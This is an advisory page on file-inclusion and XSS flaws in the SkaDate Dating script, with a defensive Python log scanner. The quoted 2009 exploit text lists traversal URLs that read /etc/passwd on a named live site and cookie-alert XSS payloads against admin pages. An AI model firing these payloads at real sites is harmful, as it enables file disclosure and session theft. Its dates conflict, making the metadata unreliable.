Vendor: SkaDate Dating
By: Moudi
CVSS: 8.8 (HIGH)
RFI/LFI/XSS
CWE: 20, 79, 352
Product Name: SkaDate Dating
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Web
2020

SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities

SkaDate Dating is affected by multiple remote vulnerabilities: remote file inclusion (RFI), local file inclusion (LFI) and cross-site scripting (XSS). An attacker can exploit them by sending crafted requests to the web application, for example with a malicious payload in the 'layout' and 'language_id' parameters. The XSS vulnerability can be exploited with a malicious payload in the 'search_string' parameter.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before the application uses it, and that the application is kept up to date with the latest security patches.
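A defender-side check for the request patterns this advisory describes, added here as an example and not part of the original advisory or of SkaDate's code: it scans access-log lines for traversal or remote-URL values in `layout` and `language_id`, and for markup in `search_string` or in the trailing path of `auth.php` and `file_uploader.php`. The simplified log shape, the regexes and the function names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

INCLUDE_PARAMS = {"layout", "language_id"}   # file-inclusion parameters named on this page
XSS_PARAMS = {"search_string"}               # XSS parameter named on this page
PATHINFO_SCRIPTS = ("auth.php/", "file_uploader.php/")  # scripts reached with a trailing path
REMOTE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)    # value is a URL (remote include)
TRAVERSAL = re.compile(r"\.\.[/\\]|^/|\x00")             # ../, absolute path, NUL byte
MARKUP = re.compile(r'[<>"]')                            # characters that break out of HTML
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (e.g. %252e%252e)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return a sorted list of finding labels for one request target."""
    parts = urlsplit(target)
    findings = set()
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)
        if name in INCLUDE_PARAMS and REMOTE.search(value):
            findings.add("rfi:" + name)
        elif name in INCLUDE_PARAMS and TRAVERSAL.search(value):
            findings.add("lfi:" + name)
        elif name in XSS_PARAMS and MARKUP.search(value):
            findings.add("xss:" + name)
    path = fully_decode(parts.path)
    for script in PATHINFO_SCRIPTS:
        if MARKUP.search(path.partition(script)[2]):  # text after the script name
            findings.add("xss:path_info")
    return sorted(findings)

def scan(lines):
    """Return (target, findings) for each log line with at least one finding."""
    targets = [m.group(1) for m in map(REQUEST.search, lines) if m]
    return [(t, classify(t)) for t in targets if classify(t)]

SAMPLE_LOG = [  # constructed lines in a simplified access-log shape
    '192.0.2.10 "GET /?layout=default HTTP/1.1" 200',
    '192.0.2.11 "GET /?language_id=%252e%252e%252fconfig HTTP/1.1" 200',
    '192.0.2.12 "GET /?language_id=http%3A%2F%2Fhost.invalid%2Fa.txt HTTP/1.1" 200',
    '192.0.2.13 "GET /admin/auth.php/%22%3E%3Cb%3E HTTP/1.1" 200',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Matches are leads for review, not proof of compromise: a hit shows the request was sent, and the response size and status in the full log help decide whether the include or reflection succeeded.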

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities
==============================================================================

        [»] Script:             [ SkaDate Dating ]
        [»] Language:           [ PHP ]
        [»] Download:           [ https://www.skadate.com/  ]
        [»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Powered by SkaDate dating ]
        [»] Price:              [ $350 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : RFI/LFI vulnerability ]===	
	
[»] http://www.site.com/patch/?layout=[LFI]
[»] http://www.site.com/patch/?language_id=[LFI]

[»] http://www.site.com/patch/?language_id=[RFI]

[»] http://www.rsvpsinglelife.com/?layout=../../../../../../../../etc/passwd
[»] http://www.rsvpsinglelife.com/?language_id=../../../../../../../../etc/passwd

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/admin/auth.php/[XSS]
[»] http://www.site.com/patch/file_uploader.php/[XSS]

[»] http://www.skadate.com/demo/admin/auth.php/"><script>alert(document.cookie);</script>
[»] http://www.skadate.com/demo/file_uploader.php/"><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-27]